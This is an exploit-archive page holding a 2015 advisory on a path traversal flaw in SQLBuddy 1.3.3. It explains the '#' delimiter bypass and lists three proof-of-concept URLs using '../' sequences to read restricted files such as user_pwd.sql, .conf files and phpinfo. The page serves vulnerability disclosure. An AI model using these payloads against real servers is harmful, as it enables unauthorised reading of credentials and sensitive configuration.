SQLBuddy 1.3.3 Path Traversal

SQLBuddy 1.3.3 Path Traversal: Posted May 15, 2015; Authored by hyp3rlinx | Site hyp3rlinx.altervista.org; SQLBuddy version 1.3.3 suffers from a path traversal vulnerability.; tags | exploit; SHA-256 | 26b03b26f977de499f40c4ff9262b83659cf00f3c96f423f714af8c65e76ef98; Download | Favorite | View

SQLBuddy 1.3.3 Path Traversal

# Exploit Title: Path traversal vulnerability
# Google Dork: intitle:path traversal
# Date: 05-08-2015
# Exploit Author:  John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.sqlbuddy.com
# Software Link: http://www.sqlbuddy.com
# Version: 1.3.3
# Tested on: windows 7
# Category: webapps

Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt



Advisory Information:
==============================
sqlbuddy suffers from directory traversal whereby a user can move about
directories an read any PHP and non PHP files by appending
the '#' hash character when requesting files via URLs.

e.g. .doc, .txt, .xml, .conf, .sql etc...

After adding the '#' character as a delimiter any non PHP will be returned
and rendered by subverting the .php concatenation used
by sqlbuddy when requesting PHP pages via POST method.

Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>


POC exploit payloads:
=======================

1-Read from Apache restricted directory under htdocs:
  http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#

2-Read any arbitrary files that do not have .PHP extensions:
  http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#

3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
  http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo



Severity Level:
===============
High


Request Method(s):
                                [+] POST

Vulnerable Product:
                                [+] sqlbuddy 1.3.3

Vulnerable Parameter(s):
                                [+] #page=somefile

Affected Area(s):
                                [+] Server directories & sensitive files




Disclaimer:
=========================
The information provided in this advisory is provided as it is without any
warranty. the security research reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits or special
damages.

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

SQLBuddy 1.3.3 Path Traversal

SQLBuddy 1.3.3 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SQLBuddy 1.3.3 Path Traversal

Share This

SQLBuddy 1.3.3 Path Traversal

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems